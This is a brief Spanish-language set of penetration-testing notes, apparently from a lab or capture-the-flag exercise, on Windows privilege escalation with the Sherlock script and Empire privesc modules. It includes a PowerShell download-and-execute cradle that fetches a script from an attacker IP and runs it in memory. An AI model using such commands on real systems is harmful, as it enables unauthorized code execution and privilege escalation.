Nota, si es windows 10 puedes usar watson ja…
Lo que estoy haciendo es activar la función:
function Find-AllVulns { if ( !$Global:ExploitTable ) { $null = New-ExploitTable } Find-MS10015 Find-MS10092 Find-MS13053 Find-MS13081 Find-MS14058 Find-MS15051 Find-MS15078 Find-MS16016 Find-MS16032 Find-MS16034 Find-MS16135 Find-CVE20177199 Get-Results }
Archivo: SherlockAllchecks
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19:8000/SherlockAllchecks.ps1')
Si en Sherlock the salen MS16032.ps1 o Invoke-MS16135.ps1 los puedes llamar manualmente desde empire https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc Solo checa que el command y la función tengan el mismo nombre. https://youtu.be/kWTnVBIpNsE?t=975
Otro lugar de powershell 64 es c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe